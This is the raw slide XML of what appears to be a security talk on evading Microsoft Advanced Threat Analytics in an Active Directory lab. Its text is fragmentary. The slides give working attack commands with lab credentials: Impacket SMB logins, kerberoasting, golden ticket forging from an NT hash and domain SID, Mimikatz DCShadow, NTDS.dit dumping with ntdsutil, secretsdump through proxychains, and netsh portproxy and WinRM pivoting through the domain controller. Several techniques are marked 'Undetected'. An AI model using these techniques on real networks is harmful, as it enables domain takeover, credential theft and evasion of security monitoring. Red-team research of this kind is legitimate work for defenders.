              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt; ∞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The price of mistakes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt; ∞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="ru-RU" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>IT stuff emails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>MS ATA Deployment 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 bypass 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00841" y="1033154"/>
            <a:ext cx="11656697" cy="5543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Bruting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ATA watches only for known account. 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brute local admin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brute new account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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NTLM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NTLM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4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4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Krb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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endParaRPr lang="en-US" sz="4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sz="4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pass-the-ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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Assets Access bypass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38392"/>
            <a:ext cx="11327233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NTLM:</a:t>
            </a:r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./smbclient.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Winlab.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/user2:Password1@172.16.2.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Kerb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>:</a:t>
            </a:r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./smbclient.py -debug -k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winlab.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/user2:Password1@dc1.winlab.local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3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vs Pass-the-Ticket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ATA Playbook:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> -&gt; RC4-MD5-HMAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Windows – AES256-SHA1-HMAC</a:t>
            </a:r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Bypass:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Use AES256 Encrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> -&gt; Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Impacket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vs Pass-the-Ticket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ATA watch for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>krb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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4400" dirty="0"/>
              <a:t>Same PC or Another PC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>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr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kerb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> ticket from same PC (socks5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>portproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>,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Use silver ticket – No DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>interact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65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8" y="148588"/>
            <a:ext cx="9656700" cy="662735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35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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Kerberoasting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55479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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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3200" dirty="0"/>
              <a:t>GetUserSPNs.py -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 172.16.2.10 -request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>winlab.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/user1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No Detection – normal workflow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Code Execution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3" y="1203223"/>
            <a:ext cx="11655479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CME, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wmiexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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Remote execution attempt detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smbexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATA suspicious service creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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40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RCE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0" y="1033154"/>
            <a:ext cx="11803339" cy="555521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06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RCE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033154"/>
            <a:ext cx="11952790" cy="562555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9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316728" cy="8845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Remote Exec and Later Movement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Bypass:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wmiexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dcomexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty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US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Exec (CME 4.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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0765744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of mistake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WTF ??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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Advanced Threat Analytics (ATA) is an on-premises platform that helps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protect your enterprise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> from multiple types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>advanced targeted cyber attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> and insider threats.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Persistence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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0" err="1"/>
              <a:t>Крымнаш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Persist: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Golden Ticket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DC dumping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C2 connections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ACE backdoors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etc</a:t>
            </a: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1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Golden Ticket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4"/>
            <a:ext cx="11773928" cy="561607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5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 Golden Ticket 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err="1"/>
              <a:t>Greate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> new Golden Ticket</a:t>
            </a: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./ticketer.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nthash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 3de688a71201f050806fa9f03056e825 -domain-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> S-1-5-21-1050284533-2970264537-631155681 -domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winlab.local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i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ataadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRP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export KRB5CCNAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ataadmin.ccache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRP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./smbclient.py -debug -no-pass -k -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 172.16.2.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winlab.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ataadmin@dc1.winlab.local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="3500" i="1" dirty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5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1" y="1033153"/>
            <a:ext cx="11777882" cy="563727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70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Bypass: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Use DC as proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" i="1" dirty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DCShadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> to add own DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dcshadow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" i="1" dirty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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> dump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntdsutil.exe "activate instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" "Create Full C:\temp\Backup" quit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="4000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D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89115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– DC as proxy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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/p3nt4/Invoke-SocksProxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ./secretsdump.py ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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=2135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135</a:t>
            </a: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=2445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445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> add v4tov4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listenport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=50155 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connectaddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connectport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>49155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7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1891159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vs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dumping – RCE on DC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2"/>
            <a:ext cx="11796156" cy="55727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NO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wmiexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DcomExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (open by default)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</a:rPr>
              <a:t>Win:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winrm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quickconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winrm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winrm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config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/client @{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrustedHosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="*"}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Invoke-Command -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dc1.winlab.local -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> add v4tov4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listenport</a:t>
            </a:r>
            <a:r>
